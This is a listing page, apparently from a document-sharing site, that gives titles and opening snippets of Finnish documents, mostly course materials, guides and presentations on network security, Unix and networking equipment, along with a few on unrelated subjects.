Tietoverkkojen turvallisuus. Tuomas Aura T-110.2100 Johdatus tietoliikenteeseen kevät 2011 Tietoverkkojen turvallisuus Tuomas Aura T-110.2100 Johdatus tietoliikenteeseen kevät 2011 Luennon sisältö 1. Palomuurit ja rajavalvonta NAT palomuurina Tilaton, tilallinen ja sovellustason palomuuri Julkiset

Lisätiedot

Määrittelydokumentti NJC2. Helsinki 11.2.2004 Ohjelmistotuotantoprojekti HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos

Määrittelydokumentti NJC2. Helsinki 11.2.2004 Ohjelmistotuotantoprojekti HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos Määrittelydokumentti NJC2 Helsinki 11.2.2004 Ohjelmistotuotantoprojekti HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos Kurssi 581260 Ohjelmistotuotantoprojekti ( ov) Projektiryhmä Eero Anttila Olli

Lisätiedot

Millainen on viihtyisä kaupunki ja miten sitä mitataan?

Millainen on viihtyisä kaupunki ja miten sitä mitataan? Millainen on viihtyisä kaupunki ja miten sitä mitataan? RATKAISUJA LUONNOSTA LYNETIN TUTKIMUSPÄIVÄ 2016 Miimu Airaksinen Research professor VTT Technical Research Centre of Finland Kaupungit ovat tärkeitä

Lisätiedot

Verkostoautomaatiojärjestelmien tietoturva

Verkostoautomaatiojärjestelmien tietoturva Verkostoautomaatiojärjestelmien tietoturva Jouko Tervo Tekla - Käyttäjäpäivät 2014 1 Renecon palvelut Toiminnan kehittäminen ICTjärjestelmien ja palvelujen hankinnat Selvitykset ja tutkimukset Tekla -

Lisätiedot

IT-OSAAJA, TIETOJENKÄSITTELYN ERIKOISTUMISOPINNOT

IT-OSAAJA, TIETOJENKÄSITTELYN ERIKOISTUMISOPINNOT IT-OSAAJA, TIETOJENKÄSITTELYN ERIKOISTUMISOPINNOT KOULUTUKSEN KOHDERYHMÄ SISÄLTÖ Koulutuksen tavoitteena on antaa opiskelijalle valmiudet uusien tietoteknisten menetelmien ja välineiden hyödyntämiseen.

Lisätiedot

GSRELE ohjeet. Yleistä

GSRELE ohjeet. Yleistä GSRELE ohjeet Yleistä GSM rele ohjaa Nokia 3310 puhelimen avulla releitä, mittaa lämpötilaa, tekee etähälytyksiä GSM-verkon avulla. Kauko-ohjauspuhelin voi olla mikä malli tahansa tai tavallinen lankapuhelin.

Lisätiedot

Digimarkkinoinnin uudet pelisäännöt Huhtikuu 2015

Digimarkkinoinnin uudet pelisäännöt Huhtikuu 2015 Digimarkkinoinnin uudet pelisäännöt Huhtikuu 2015 Any sufficiently advanced technology is indistinguishable from magic. - Arthur C Clarke Millaisia mahdollisuuksia uudet teknologiat tarjoavat? Internet

Lisätiedot

Ei raportteja roskiin

Ei raportteja roskiin Ei raportteja roskiin Wikit ja blogit opetuksessa Sosiaalinen media koulutuksessa Tietotekniikan liitto - Helia 2006-11-16 Ei raportteja roskiin Vanha ja uusi tapa Käytännön kokemuksia Lisenssit Tekniikka

Lisätiedot

Taloyhtiön laajakaistan käyttöohje, Tekniikka: HomePNA. Käyttöjärjestelmä: Windows XP

Taloyhtiön laajakaistan käyttöohje, Tekniikka: HomePNA. Käyttöjärjestelmä: Windows XP Taloyhtiön laajakaistan käyttöohje, Tekniikka: HomePNA Käyttöjärjestelmä: Windows XP Espoon Taloyhtiöverkot Oy, 2010 Tervetuloa Espoon Taloyhtiöverkkojen laajakaistan käyttäjäksi! Tässä ohjeessa opastetaan,

Lisätiedot

Avoimet laitteet - riski verkossa Antti Kiuru@KiuruAntti Kyberturvallisuuskeskus, Viestintävirasto. Antti Kiuru, Tilannekeskuksen päällikkö

Avoimet laitteet - riski verkossa Antti Kiuru@KiuruAntti Kyberturvallisuuskeskus, Viestintävirasto. Antti Kiuru, Tilannekeskuksen päällikkö Avoimet laitteet - riski verkossa Antti Kiuru@KiuruAntti Kyberturvallisuuskeskus, Viestintävirasto Avoimet palvelut Avoimet välityspalvelimet ja muut palvelut Verkkoon liitetyt avoimet automaatiolaitteet

Lisätiedot

eduroamin käyttöohje Windows

eduroamin käyttöohje Windows eduroamin käyttöohje eduroamissa liitytään verkkoon käyttäen 802.1x:ää. Tätä varten tarvitaan suplikantti ja tietokoneissa voidaan käyttää Windowsin tai Linuxin oma suplikanttia. eduroamiin voidaan myös

Lisätiedot

Verkkoliikenteen rajoittaminen tietoturvasta huolehtimiseksi ja häiriön korjaamiseksi

Verkkoliikenteen rajoittaminen tietoturvasta huolehtimiseksi ja häiriön korjaamiseksi Julkinen Verkkoliikenteen rajoittaminen tietoturvasta huolehtimiseksi ja häiriön korjaamiseksi 20.11.2013 Julkinen 2 VML 131 Velvollisuus korjata häiriö Jos viestintäverkko tai laite aiheuttaa vaaraa tai

Lisätiedot

KASVAVAN KYBERTURVAMARKKINAN PELINTEKIJÄ

KASVAVAN KYBERTURVAMARKKINAN PELINTEKIJÄ KASVAVAN KYBERTURVAMARKKINAN PELINTEKIJÄ Petri Kairinen, CEO (twitter: @kairinen) Lupaavat pörssiyhtiöt tilaisuus 3.3.2015 3.3.2015 Nixu 2015 1 PIDÄMME DIGITAALISEN YHTEISKUNNAN TOIMINNASSA. 3.3.2015 Nixu

Lisätiedot

Loppukäyttäjän ohje Asennus- ja käyttöohje Mac

Loppukäyttäjän ohje Asennus- ja käyttöohje Mac Loppukäyttäjän ohje Asennus- ja käyttöohje Mac Fujitsun mpollux DigiSign Client on kortinlukijaohjelmisto, jonka avulla voit kirjautua luotettavasti ja turvallisesti organisaation tietoverkkoon tai sähköiseen

Lisätiedot

NÄIN OTAT F-SECURE SAFEN KÄYTTÖÖN

NÄIN OTAT F-SECURE SAFEN KÄYTTÖÖN NÄIN OTAT F-SECURE SAFEN KÄYTTÖÖN 2 REKISTERÖINTI Avaa saamasi SAFE -linkki tai mene ostamastasi tuotepakkauksesta löytyvään osoitteeseen. 2 Täytä lomake ja valitse vahva salasana. Klikkaa Luo käyttäjätili.

Lisätiedot

Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Jykes &

Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Jykes & Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Vepsäläinen, @pveps Jykes & Kyber-INKA, @CyberFinland 11.3.2016 on Digitalisaation tukijalka SoTe-sektorillakin Digitalisaatio hyötykäyttöön

Lisätiedot

Garmin laitteiden ohjelmistopäivitys

Garmin laitteiden ohjelmistopäivitys Garmin laitteiden ohjelmistopäivitys Laitteen ohjelmisto päivitys kannattaa suorittaa silloin tällöin, varsinkin ennen karttapäivityksen tekemistä ja laitteen rekisteröintiä. Ohjelmistopäivityksellä voit

Lisätiedot

Kahden virtualisointiohjelmiston suorituskyvyn testaus (valmiin työn esittely)

Kahden virtualisointiohjelmiston suorituskyvyn testaus (valmiin työn esittely) Kahden virtualisointiohjelmiston suorituskyvyn testaus (valmiin työn esittely) Jani Laine 31.10.2017 Ohjaaja: DI Jimmy Kjällman Valvoja: Prof. Kai Virtanen Työn saa tallentaa ja julkistaa Aalto-yliopiston

Lisätiedot

TIETOTURVALLISUUDESTA

TIETOTURVALLISUUDESTA TIETOTURVALLISUUDESTA Tietoturvallisuus riippuu monista asioista. Tärkein niistä on käyttäjä itse! Käyttäjä voi toimia turvallisesti tai turvattomasti Tervettä harkintaa tarvitaan erityisesti Internetin

Lisätiedot

Liiketoimintaa ICT-osaamisesta vahvuuksilla eteenpäin. Jussi Paakkari, teknologiajohtaja, VTT, R&D, ICT

Liiketoimintaa ICT-osaamisesta vahvuuksilla eteenpäin. Jussi Paakkari, teknologiajohtaja, VTT, R&D, ICT Liiketoimintaa ICT-osaamisesta vahvuuksilla eteenpäin Jussi Paakkari, teknologiajohtaja, VTT, R&D, ICT 2 Tietoliikenneosaamisen hyödyntäminen ja ylläpito Internetin lisääntyvä käyttö, palveluiden digitalisoituminen

Lisätiedot

Luento 5. Timo Savola. 28. huhtikuuta 2006

Luento 5. Timo Savola. 28. huhtikuuta 2006 UNIX-käyttöjärjestelmä Luento 5 Timo Savola 28. huhtikuuta 2006 Osa I Shell-ohjelmointi Ehtolause Lausekkeet suoritetaan jos ehtolausekkeen paluuarvo on 0 if ehtolauseke then lauseke

Lisätiedot

ZA4881. Flash Eurobarometer 241 (Information society as seen by EU citizens) Country Specific Questionnaire Finland

ZA4881. Flash Eurobarometer 241 (Information society as seen by EU citizens) Country Specific Questionnaire Finland ZA4881 Flash Eurobarometer 241 (Information society as seen by EU citizens) Country Specific Questionnaire Finland FLASH 241 INFORMATION SOCIETY Q1. Luen teille seuraavaksi joukon vapaa-ajanviettotapoja.

Lisätiedot

T-79.4501 Cryptography and Data Security

T-79.4501 Cryptography and Data Security T-79.4501 Cryptography and Data Security Lecture 11 Bluetooth Security Bluetooth turvallisuus Uhkakuvat Bluetooth turvallisuuden tavoitteet Linkkitason turvamekanismit Pairing menettely Autentikointi ja

Lisätiedot

Peliohjelmointi: Kontrollilaitteet. Teppo Soininen

Peliohjelmointi: Kontrollilaitteet. Teppo Soininen Peliohjelmointi: Kontrollilaitteet Teppo Soininen Lähteet: Core Techniques and Algorithms in Game Programming, MSDN, www.xbox.com, www.playstation.com Arsenaali Tietokonepeleissä käytettäviä kontrollilaitteita

Lisätiedot

Tavaroiden ulkomaankauppatilastojen tulkinnan haasteet. 22.3.2012 Timo Koskimäki

Tavaroiden ulkomaankauppatilastojen tulkinnan haasteet. 22.3.2012 Timo Koskimäki Tavaroiden ulkomaankauppatilastojen tulkinnan haasteet 22.3.2012 Timo Koskimäki 1 Sisältö Johdannoksi Esimerkit Mikro: Kännykän arvonlisän komponentit Makro: Suomen kauppatase ja viestintäklusteri Kauppatilastojen

Lisätiedot

Unix-perusteet. Unix/Linux-käyttöjärjestelmä ja sen ominaisuudet

Unix-perusteet. Unix/Linux-käyttöjärjestelmä ja sen ominaisuudet Unix-perusteet Unix/Linux-käyttöjärjestelmä ja sen ominaisuudet Mikä on unix? Monen käyttäjän käyttöjärjestelmä Siis monta käyttäjää ja monta ohjelmaa jokaisella Kaikkiin koneisiin mikrosta supertietokoneeseen

Lisätiedot

TIEA222 Tietoturva, laboratoriotyö 1

TIEA222 Tietoturva, laboratoriotyö 1 TIEA222 Tietoturva, laboratoriotyö 1 Joel Lehtonen et al. 23.9.2010, v1.11 1 Johdanto WLAN-verkkoja löytyy nykyään lähes kaikkialta kouluista, työpaikoilta, kodeista ja avoimiakin WLANverkkoja on tarjolla.

Lisätiedot

Käyttöjärjestelmät(CT50A2602)

Käyttöjärjestelmät(CT50A2602) V 2.0 Käyttöjärjestelmät(CT50A2602) KÄYTTÖJÄRJESTELMIEN TIETOTURVA Ryhmä: Hauvala, Anssi 0398197 Kellokoski, Keijo, 0398317 Manninen, Jaana 0369498 Manninen, Sami 0315464 Nurmela, Marja-Leena 0398375 Tanttu,

Lisätiedot

Vaivattomasti parasta tietoturvaa

Vaivattomasti parasta tietoturvaa Vaivattomasti parasta tietoturvaa BUSINESS SUITE Tietoturvan valinta voi olla myös helppoa Yrityksen tietoturvan valinta voi olla vaikeaa loputtomien vaihtoehtojen suossa tarpomista. F-Secure Business

Lisätiedot

Ti LÄHIVERKOT -erikoistyökurssi. X Window System. Jukka Lankinen

Ti LÄHIVERKOT -erikoistyökurssi. X Window System. Jukka Lankinen Ti5316800 LÄHIVERKOT -erikoistyökurssi X Window System Jukka Lankinen 2007-2008 Sisällys Esitys vastaa seuraaviin kysymyksiin: Mikä on X Window System? Minkälainen X on? Mistä sen saa? Miten X:ää käytetään?

Lisätiedot

1999 valmiiksi 35 laitteen prototyyppisarja radiolla (kotelo halvalla )

1999 valmiiksi 35 laitteen prototyyppisarja radiolla (kotelo halvalla ) Vesa Lappalainen Miksi? Tavoitteena interaktio massaluennoilla Tuloksena esimerkki projektista, mistä kaikki sanovat että hieno idea, mutta kukaan ei halua maksaa Nykyisin paljon kaupallisesti Clicker

Lisätiedot

Sulautettu tietotekniikka 2007 2013 Ubiquitous Real World Real Time for First Lives

Sulautettu tietotekniikka 2007 2013 Ubiquitous Real World Real Time for First Lives Sulautettu tietotekniikka 2007 2013 Ubiquitous Real World Real Time for First Lives Jari Ikonen 16.10.2012 Ubicom sulautettu tietotekniikka Ubicom - Sulautettu tietotekniikka -ohjelma Alkoi vuonna 2007

Lisätiedot

Siemens Webserver OZW672

Siemens Webserver OZW672 Siemens Webserver OZW67 Climatix IC pilvipalvelu Kytke laite lämpöpumpun ohjaimeen Kytke laite verkkopiuhalla internetiin Mene nettiselaimella Climatix IC palveluun Luo käyttäjätili ja rekisteröi laite

Lisätiedot

Enemmän voitonriemua. Vähemmän tylsiä hetkiä. Pelien ja sovellusten jakaminen Sonera Viihde -palvelussa

Enemmän voitonriemua. Vähemmän tylsiä hetkiä. Pelien ja sovellusten jakaminen Sonera Viihde -palvelussa Enemmän voitonriemua. Vähemmän tylsiä hetkiä. Pelien ja sovellusten jakaminen Sonera Viihde -palvelussa Sisällysluettelo 1. Game & Application Sharing -toiminto (pelien ja sovellusten jakaminen)... 3 2.

Lisätiedot

IoT (Internet-of-Things) - teknologian hyödyntäminen rakennuksien paloturvallisuuden kehityksessä ja integroidussa älykkäässä ympäristössä

IoT (Internet-of-Things) - teknologian hyödyntäminen rakennuksien paloturvallisuuden kehityksessä ja integroidussa älykkäässä ympäristössä IoT (Internet-of-Things) - teknologian hyödyntäminen rakennuksien paloturvallisuuden kehityksessä ja integroidussa älykkäässä ympäristössä Diplomityö, Lappeenrannan teknillinen yliopisto Palotarkastusinsinööri

Lisätiedot

Tietoyhteiskunnan haavoittuvuus kuinka voimme hallita sitä?

Tietoyhteiskunnan haavoittuvuus kuinka voimme hallita sitä? Huoltovarmuuskeskuksen 10-vuotisjuhlaseminaari Helsinki, 26.2.2003 Tietoyhteiskunnan haavoittuvuus kuinka voimme hallita sitä? TkT Arto Karila Karila A. & E. Oy E-mail: arto.karila@karila.com HVK, 26.2.2003-1

Lisätiedot

KYBERTURVAMARKKINA KASVAA TEEMME KYBERTURVASTA TOTTA

KYBERTURVAMARKKINA KASVAA TEEMME KYBERTURVASTA TOTTA KYBERTURVAMARKKINA KASVAA TEEMME KYBERTURVASTA TOTTA Petri Kairinen, toimitusjohtaja (twitter: @kairinen) Nordnet-aamiaistilaisuus, Helsinki, 24.9.2015 24.9.2015 Nixu 2015 1 PIDÄMME DIGITAALISEN YHTEISKUNNAN

Lisätiedot

Laitteessa tulee olla ohjelmisto tai uudempi, tarvittaessa päivitä laite

Laitteessa tulee olla ohjelmisto tai uudempi, tarvittaessa päivitä laite TW-EAV510: PORTTIOHJAUS (VIRTUAL SERVER) ESIMERKISSÄ VALVONTAKAMERAN KYTKEMINEN VERKKOON Laitteessa tulee olla ohjelmisto 5.00.49 tai uudempi, tarvittaessa päivitä laite OPERAATTORIN IP---OSOITE - Jotta

Lisätiedot

Maailman ensimmäinen Plug & Go etäyhteyslaite

Maailman ensimmäinen Plug & Go etäyhteyslaite Maailman ensimmäinen Plug & Go etäyhteyslaite PATENTOITU RATKAISU» Suojattu patenteilla laitejärjestely sekä yhteydenmuodostus menetelmä ONGELMA» Sisäverkossa verkkolaitteiden käyttäminen on helppoa» Kun

Lisätiedot

- ai miten niin? Twitter: @CyberFinland www.cyberfinland.fi

- ai miten niin? Twitter: @CyberFinland www.cyberfinland.fi - ai miten niin? - miksi ihmeessä? Kyberturvallisuus - miksi ihmeessä? Kyberrikollisuus Kyberrikollisuudessa vuotuisesti liikkuvan rahan määrä on ylittänyt huumausainerikollisuudessa vuotuisesti

Lisätiedot

Yleinen ohjeistus Linux tehtävään

Yleinen ohjeistus Linux tehtävään Yleinen ohjeistus Linux tehtävään Sinulle on toimitettu valmiiksi asennettu HYPER V ympäristö. Tehtäväsi on asentaa tarvittavat virtuaalikoneet, sekä konfiguroida ne ja verkkolaitteet, tehtävän mukaisesti.

Lisätiedot

Tietoturvan haasteet grideille

Tietoturvan haasteet grideille Tietoturvan haasteet grideille / Arto Teräs 2005-09-06 Kalvo 1(10) Tietoturvan haasteet grideille Arto Teräs FUNET CERT 10-vuotispäivät Espoo, 6.9.2005 Grid Tietoturvan haasteet grideille

Lisätiedot

Identiteetin merkitys seuraavan sukupolven tietoturva-arkkitehtuurissa. Janne Tägtström Security Systems Engineer

Identiteetin merkitys seuraavan sukupolven tietoturva-arkkitehtuurissa. Janne Tägtström Security Systems Engineer Identiteetin merkitys seuraavan sukupolven tietoturva-arkkitehtuurissa Janne Tägtström Security Systems Engineer Agenda Organisaatioiden IT-haasteet (tietoturva)valmiudet vastata haasteisiin Käytännön

Lisätiedot

Puhelinnumeroiden lataaminen laitteesta tietokoneelle

Puhelinnumeroiden lataaminen laitteesta tietokoneelle OHJE 1/9 Yleistä Saunalahti on lähettänyt asiakkaillemme uuden SIM kortin. Kaikki Saunalahden SIM kortit tulevat vaihtumaan jollakin aikajaksolla Saunalahden siirryttyä palveluoperaattorista virtuaalioperaattoriksi.

Lisätiedot

Unix-perusteet. Tiedosto-oikeudet

Unix-perusteet. Tiedosto-oikeudet Unix-perusteet Tiedosto-oikeudet Tietoturvaan liittyviä seikkoja kulunvalvonta kellä oikeus päästä laitteiden luokse käyttöoikeudet käyttäjätunnus & salasana tiedostojärjestelmän oikeudet unixissa omistajan,

Lisätiedot

ZENworks Application Virtualization 11

ZENworks Application Virtualization 11 ZENworks Application Virtualization 11 ZENworks / perinteinen asennus ZENworks virtualisointi Ei erillistä asennusta Ei vaadita erilisiä oikeuksia Oletusasetukset mukana Eri versiot samanaikaisesti Sama

Lisätiedot

T-Cam IPC900 HD PTZ valvontakamera

T-Cam IPC900 HD PTZ valvontakamera T-Cam IPC900 HD PTZ valvontakamera Sisällysluettelo Ennen käyttöä... 1 Käyttöehdot... 1 Huomioitavaa... 1 Käyttöolosuhteet... 1 Valvontakameran käyttöönotto... 2 Kameran etäkäyttö... 2 Kameran kytkeminen...

Lisätiedot

VMU-C EM. Asennus ja käyttö

VMU-C EM. Asennus ja käyttö VMU-C EM Asennus ja käyttö Asennus USB-kaapelinavulla 1. Liitetään tyhjä USB-muistitikkulaitteeseen ja odotetaan kunnes USB-valolakkaa vilkkumasta USB-muistitikku liitetään tänne 2. Irrotetaan USB-muistitikkuja

Lisätiedot

Luento 3. Timo Savola. 7. huhtikuuta 2006

Luento 3. Timo Savola. 7. huhtikuuta 2006 UNIX-käyttöjärjestelmä Luento 3 Timo Savola 7. huhtikuuta 2006 Osa I Käyttöoikeudet Käyttöoikeudet Monen käyttäjän järjestelmä Prosessit kuuluvat eri käyttäjille Tiedostot kuuluvat

Lisätiedot

Tietokoneiden ja mobiililaitteiden tietoturva

Tietokoneiden ja mobiililaitteiden tietoturva Tietokoneiden ja mobiililaitteiden tietoturva mikko.kaariainen@opisto.hel.fi 8.3.2016 Lataa luennon materiaali, kirjoita osoite selaimen osoitelokeroon: opi.opisto.hel.fi/mikko Tietokoneen suojaus Palomuuri

Lisätiedot

Pika-aloitusopas 4G-reititin Huawei E5172

Pika-aloitusopas 4G-reititin Huawei E5172 Pika-aloitusopas 4G-reititin Huawei E5172 Kiitos, kun ostit Huawei E5172 -mobiilireitittimen. Tämä mobiilireititin tarjoaa nopean langattoman verkkoyhteyden. Lue tämä opas huolellisesti, ennen kuin ryhdyt

Lisätiedot

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows Vista

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows Vista Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows Vista Espoon Taloyhtiöverkot, 2010 Tervetuloa Espoon Taloyhtiöverkkojen laajakaistan käyttäjäksi! Tässä ohjeessa

Lisätiedot